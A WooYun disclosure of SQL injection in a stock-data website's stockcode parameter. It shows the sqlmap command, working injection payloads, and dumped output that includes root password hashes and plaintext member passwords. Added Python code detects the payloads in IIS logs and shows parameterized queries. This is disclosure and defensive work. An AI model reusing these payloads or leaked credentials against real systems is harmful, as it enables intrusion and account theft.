Vulnerability Summary

Defect ID: wooyun-2015-0154252

Title: SQL injection on the Dingniugu website (DBA privileges + root password leaked + 2,000,000 stock data records leaked)

Affected vendor: Dingniugu (顶牛股)

Author: 路人甲

Submitted: 2015-11-19 11:30

Fix time: 2016-01-11 15:34

Published: 2016-01-11 15:34

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 10

Status: vendor could not be contacted, or the vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help, contact [email protected]


Vulnerability Details

Disclosure status:

2015-11-19: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed to the public
2016-01-11: The vendor has actively ignored the vulnerability; details disclosed to the public

Summary:

SQL injection on the Dingniugu website (DBA privileges + root password leaked + 2,000,000 stock data records leaked)

Details:

URL: http://www.dingniugu.com/ddeLine.php?stockcode=601111

python sqlmap.py -u "http://www.dingniugu.com/ddeLine.php?stockcode=601111" -p stockcode --technique=BTU --random-agent --batch  --current-user --is-dba --users --passwords --count --search -C pass


Database: scms
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| ddedata | 2068057 |


Database: scms
Table: ddedata
[30 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| time | varchar(20) |
| bb | varchar(20) |
| cjgs | varchar(20) |
| cjl | varchar(20) |
| code | varchar(20) |
| dat | varchar(20) |
| ddmc | varchar(20) |
| ddmr | varchar(20) |
| ddx | varchar(20) |
| ddy | varchar(20) |
| ddz | varchar(20) |
| dsmc | varchar(20) |
| dsmr | varchar(20) |
| ff | varchar(20) |
| hh | varchar(20) |
| Increase | varchar(20) |
| junjia | varchar(20) |
| kaipan | varchar(20) |
| ltgs | varchar(20) |
| price | varchar(20) |
| shoupan | varchar(20) |
| tdmc | varchar(20) |
| tdmr | varchar(20) |
| xdmc | varchar(20) |
| xdmr | varchar(20) |
| zml | varchar(20) |
| zmml | varchar(20) |
| zs | varchar(20) |
| zuidi | varchar(20) |
| zuigao | varchar(20) |
+----------+-------------+

Proof of vulnerability:

---
Parameter: stockcode (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: stockcode=601111' AND 8684=8684 AND 'Pobi'='Pobi
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: stockcode=601111' AND (SELECT * FROM (SELECT(SLEEP(5)))FOJq) AND 'OAgX'='OAgX
Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: stockcode=-7552' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a6b7871,0x7a624d646e6e545057744578744c456e42555a7a764f7667466f76434f77736556525050526e4354,0x71787a6b71)-- -
---
web server operating system: Windows 2003 or XP
web application technology: Microsoft IIS 6.0, PHP 5.2.5
back-end DBMS: MySQL 5.0.12
current user: 'root@localhost'
current user is DBA: True
database management system users [2]:
[*] 'dingniugubbs'@'58.64.150.175'
[*] 'root'@'localhost'
database management system users password hashes:
[*] dingniugubbs [1]:
password hash: *371C0BA5302BB7C0CA17B74D106DB595839497F3
[*] root [1]:
password hash: *EE4A8CAEFA3CF6FD89EA134107E2D6A2755AAAB2
Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 461 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 126 |
| COLLATIONS | 126 |
| STATISTICS | 73 |
| KEY_COLUMN_USAGE | 54 |
| TABLES | 48 |
| CHARACTER_SETS | 36 |
| TABLE_CONSTRAINTS | 34 |
| USER_PRIVILEGES | 26 |
| SCHEMA_PRIVILEGES | 16 |
| SCHEMATA | 3 |
+---------------------------------------+---------+
Database: scms
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| ddedata | 2068057 |
| golddata | 81162 |
| art | 27753 |
| bestgourl | 3026 |
| ziliao | 2810 |
| yjyg | 2627 |
| nbyj | 2482 |
| bk | 2458 |
| bankcon | 781 |
| rmb | 183 |
| bank | 152 |
| bankll | 7 |
| userzxg | 3 |
| member | 2 |
+---------------------------------------+---------+
Database: mysql
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| help_relation | 825 |
| help_topic | 475 |
| help_keyword | 401 |
| help_category | 36 |
| `user` | 2 |
| db | 1 |
| func | 1 |
+---------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: scms
Table: member
[1 column]
+-----------------+-------------+
| Column | Type |
+-----------------+-------------+
| member_password | varchar(32) |
+-----------------+-------------+
Database: mysql
Table: user
[1 column]
+----------+----------+
| Column | Type |
+----------+----------+
| Password | char(41) |
+----------+----------+
Database: scms
Table: member
[2 entries]
+-----------------+
| member_password |
+-----------------+
| 666666 |
| 837400 |
+-----------------+
Database: mysql
Table: user
[2 entries]
+-------------------------------------------+
| Password |
+-------------------------------------------+
| *371C0BA5302BB7C0CA17B74D106DB595839497F3 |
| *EE4A8CAEFA3CF6FD89EA134107E2D6A2755AAAB2 |
+-------------------------------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: stockcode (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: stockcode=601111' AND 8684=8684 AND 'Pobi'='Pobi
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: stockcode=601111' AND (SELECT * FROM (SELECT(SLEEP(5)))FOJq) AND 'OAgX'='OAgX
Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: stockcode=-7552' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a6b7871,0x7a624d646e6e545057744578744c456e42555a7a764f7667466f76434f77736556525050526e4354,0x71787a6b71)-- -
---
web server operating system: Windows 2003 or XP
web application technology: Microsoft IIS 6.0, PHP 5.2.5
back-end DBMS: MySQL 5.0.12
available databases [3]:
[*] information_schema
[*] mysql
[*] scms
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: stockcode (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: stockcode=601111' AND 8684=8684 AND 'Pobi'='Pobi
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: stockcode=601111' AND (SELECT * FROM (SELECT(SLEEP(5)))FOJq) AND 'OAgX'='OAgX
Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: stockcode=-7552' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a6b7871,0x7a624d646e6e545057744578744c456e42555a7a764f7667466f76434f77736556525050526e4354,0x71787a6b71)-- -
---
web server operating system: Windows 2003 or XP
web application technology: Microsoft IIS 6.0, PHP 5.2.5
back-end DBMS: MySQL 5.0.12
Database: scms
Table: ddedata
[30 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| time | varchar(20) |
| bb | varchar(20) |
| cjgs | varchar(20) |
| cjl | varchar(20) |
| code | varchar(20) |
| dat | varchar(20) |
| ddmc | varchar(20) |
| ddmr | varchar(20) |
| ddx | varchar(20) |
| ddy | varchar(20) |
| ddz | varchar(20) |
| dsmc | varchar(20) |
| dsmr | varchar(20) |
| ff | varchar(20) |
| hh | varchar(20) |
| Increase | varchar(20) |
| junjia | varchar(20) |
| kaipan | varchar(20) |
| ltgs | varchar(20) |
| price | varchar(20) |
| shoupan | varchar(20) |
| tdmc | varchar(20) |
| tdmr | varchar(20) |
| xdmc | varchar(20) |
| xdmr | varchar(20) |
| zml | varchar(20) |
| zmml | varchar(20) |
| zs | varchar(20) |
| zuidi | varchar(20) |
| zuigao | varchar(20) |
+----------+-------------+
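The sqlmap run above was launched with --random-agent, so the requests do not announce themselves in the User-Agent field; what does stand out in the web server's own log is the shape of the stockcode value. The following is an added example, not part of the original report: it parses IIS W3C extended log lines (the report identifies the server as IIS 6.0), percent-decodes the query string and flags stockcode values that are not a six-digit code, labelling them by the three payload classes sqlmap reported. The log excerpt is constructed to mirror those payloads and is not captured traffic; the client addresses are RFC 5737 documentation ranges.

```python
"""Scan IIS W3C logs for SQL-injection probes against ddeLine.php?stockcode=.

Added example, not part of the original report. The log excerpt is constructed to
mirror the report's three payload classes; it is not captured traffic. Field layout
follows the IIS W3C extended format, where spaces in logged values appear as '+'.
"""
import re
from urllib.parse import parse_qs

# Constructed sample log (not real traffic). Client IPs are RFC 5737 documentation addresses.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip cs(User-Agent) sc-status
2015-11-19 03:12:01 GET /ddeLine.php stockcode=601111 203.0.113.10 Mozilla/5.0+(Windows+NT+5.1) 200
2015-11-19 03:12:05 GET /ddeLine.php stockcode=601111%27+AND+8684%3D8684+AND+%27Pobi%27%3D%27Pobi 203.0.113.10 Mozilla/5.0+(Windows+NT+5.1) 200
2015-11-19 03:12:06 GET /ddeLine.php stockcode=601111%27+AND+%28SELECT+*+FROM+%28SELECT%28SLEEP%285%29%29%29FOJq%29+AND+%27OAgX%27%3D%27OAgX 203.0.113.10 Mozilla/5.0+(Windows+NT+5.1) 200
2015-11-19 03:12:09 GET /ddeLine.php stockcode=-7552%27+UNION+ALL+SELECT+NULL%2CNULL%2CNULL%2CCONCAT%280x716a6b7871%2C0x71787a6b71%29--+- 203.0.113.10 Mozilla/5.0+(Windows+NT+5.1) 200
2015-11-19 03:13:44 GET /ddeLine.php stockcode=600000 198.51.100.7 Mozilla/5.0+(Windows+NT+6.1) 200
"""

# A-share stock codes are six digits; anything else in this parameter is out of contract.
VALID_STOCKCODE = re.compile(r"^\d{6}$")

# Ordered most-specific first: the time-based payload also contains "' AND".
SIGNATURES = (
    ("union-based", re.compile(r"\bUNION\b.*\bSELECT\b", re.I | re.S)),
    ("time-based blind", re.compile(r"\b(SLEEP|BENCHMARK)\s*\(", re.I)),
    ("boolean-based blind", re.compile(r"'\s*(AND|OR)\b", re.I)),
)


def classify(value):
    """Return a verdict string for a stockcode value, or None if it is well-formed."""
    if VALID_STOCKCODE.match(value):
        return None
    for label, pattern in SIGNATURES:
        if pattern.search(value):
            return label
    return "malformed parameter"


def parse_w3c(text):
    """Yield one dict per request line, keyed by the names in the #Fields directive."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        if fields and len(parts) == len(fields):
            yield dict(zip(fields, parts))


def scan_log(text, param="stockcode"):
    """Return flagged requests: (time, client IP, decoded parameter value, verdict)."""
    findings = []
    for rec in parse_w3c(text):
        # parse_qs percent-decodes and turns '+' back into spaces, so the
        # signatures match the payload as the database would have seen it.
        values = parse_qs(rec.get("cs-uri-query", "")).get(param)
        if not values:
            continue
        verdict = classify(values[0])
        if verdict:
            findings.append((rec["time"], rec["c-ip"], values[0], verdict))
    return findings


def probes_per_client(findings):
    """Count flagged requests by source address; sqlmap produces bursts from one client."""
    counts = {}
    for _, ip, _, _ in findings:
        counts[ip] = counts.get(ip, 0) + 1
    return counts


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for t, ip, value, verdict in hits:
        print(f"{t} {ip} {verdict}: {value}")
    print(probes_per_client(hits))
```

The allow-list check (six digits) does the real work; the signature labels only explain which technique a flagged request resembles. Because IIS logs cs-uri-query as the client sent it, matching must happen after decoding, otherwise `%27` and `+` hide the quote and the keywords.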

Remediation:

Add input filtering.

Copyright notice: please credit the source when reposting: 路人甲@WooYun


Vendor Response

Vendor response:

The vendor could not be contacted, or the vendor actively refused.
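Filtering on its own is a weak fix for this class of bug; the durable one is to stop the parameter from ever being parsed as SQL. The block below is an added example, not the site's code: a Python/sqlite3 stand-in for the PHP/MySQL pattern the report's payloads imply, with a constructed table in place of scms.ddedata. It puts the concatenated query beside a bound-parameter version and shows, using the report's own boolean payload, that only the concatenated form gives the one-bit oracle sqlmap relied on. On the page's actual stack the equivalent of the bound `?` is a PDO or mysqli prepared statement, both of which exist in PHP 5.2.

```python
"""Vulnerable vs. hardened handling of the stockcode parameter.

Added example, not the site's code: a Python/sqlite3 stand-in for the PHP/MySQL
pattern the report's payloads imply. The table and rows are constructed.
"""
import re
import sqlite3

# Stock codes on the site are six digits (the report's request uses 601111).
STOCKCODE_RE = re.compile(r"^\d{6}$")


def build_db():
    """In-memory stand-in for scms.ddedata with a few constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE ddedata (code TEXT, time TEXT, price TEXT)")
    conn.executemany(
        "INSERT INTO ddedata VALUES (?, ?, ?)",
        [("601111", "2015-11-18", "7.35"), ("600000", "2015-11-18", "16.10")],
    )
    return conn


def lookup_vulnerable(conn, stockcode):
    """Builds the WHERE clause by concatenation, so the input is parsed as SQL.

    A true appended condition leaves the 601111 row in place, a false one
    removes it: that one-bit difference is the boolean-based blind oracle
    sqlmap reported.
    """
    sql = "SELECT code, time, price FROM ddedata WHERE code = '" + stockcode + "'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, stockcode):
    """Binds the value; whatever it contains is compared as one literal string."""
    sql = "SELECT code, time, price FROM ddedata WHERE code = ?"
    return conn.execute(sql, (stockcode,)).fetchall()


def lookup_hardened(conn, stockcode):
    """Allow-list first, then bind.

    Rejecting malformed input early keeps probes out of the database entirely
    and gives the application a clean place to log and rate-limit them.
    """
    if not STOCKCODE_RE.match(stockcode):
        raise ValueError("stockcode must be exactly six digits")
    return lookup_parameterized(conn, stockcode)


def hardened_rejects(conn, stockcode):
    """Return True when the hardened lookup refuses the value before querying."""
    try:
        lookup_hardened(conn, stockcode)
    except ValueError:
        return True
    return False


TRUE_PROBE = "601111' AND 8684=8684 AND 'Pobi'='Pobi"   # payload from the report
FALSE_PROBE = "601111' AND 8684=8685 AND 'Pobi'='Pobi"  # same shape, false condition


def oracle_visible(lookup, conn):
    """True when the result differs between the true and false probe, i.e. the
    caller can infer one bit of database state per request."""
    return lookup(conn, TRUE_PROBE) != lookup(conn, FALSE_PROBE)


if __name__ == "__main__":
    db = build_db()
    print("concatenated query leaks an oracle:", oracle_visible(lookup_vulnerable, db))
    print("bound parameter leaks an oracle:   ", oracle_visible(lookup_parameterized, db))
    print("hardened lookup rejects the probe:  ", hardened_rejects(db, TRUE_PROBE))
    print("hardened lookup, normal input:", lookup_hardened(db, "601111"))
```

Two further points follow from the report's own output rather than from the code: the application was connecting as 'root'@'localhost' with DBA rights, so a query-level fix should be paired with a dedicated account granted only SELECT on the tables ddeLine.php needs; and the member_password column held bare six-digit values, which a database read turned straight into usable credentials.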